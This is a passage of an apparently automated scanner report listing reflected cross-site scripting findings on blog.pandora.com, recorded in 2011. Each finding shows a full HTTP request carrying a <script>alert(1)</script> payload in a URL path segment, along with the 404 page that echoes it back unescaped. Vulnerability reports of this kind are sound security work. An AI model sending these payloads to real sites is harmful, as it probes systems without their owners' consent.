This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61a2b<script>alert(1)</script>066ab1d13fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5b43<script>alert(1)</script>94fa79588e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d8f8<script>alert(1)</script>102c29e82d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccdb2<script>alert(1)</script>a59406e84d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e73b<script>alert(1)</script>402d0eee6e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e3124<script>alert(1)</script>06bc8e10aef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94c76<script>alert(1)</script>fbd7c19bc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 359

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e61d<script>alert(1)</script>1df9109ab61 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8354d<script>alert(1)</script>0b81ccc9992 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26b1e<script>alert(1)</script>c6bfcd2ec61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11e8c<script>alert(1)</script>8fd48e0eb0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 354
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a87e3<script>alert(1)</script>667affef35b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be7ff<script>alert(1)</script>bb3bcc17fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0a19<script>alert(1)</script>050c2fa5c54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dd0c<script>alert(1)</script>f718eac7bb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76e6c<script>alert(1)</script>5b51d9c237f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea264<script>alert(1)</script>98cd7486264 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54e68<script>alert(1)</script>3cadd9a1ed0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0467<script>alert(1)</script>c653de1c429 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
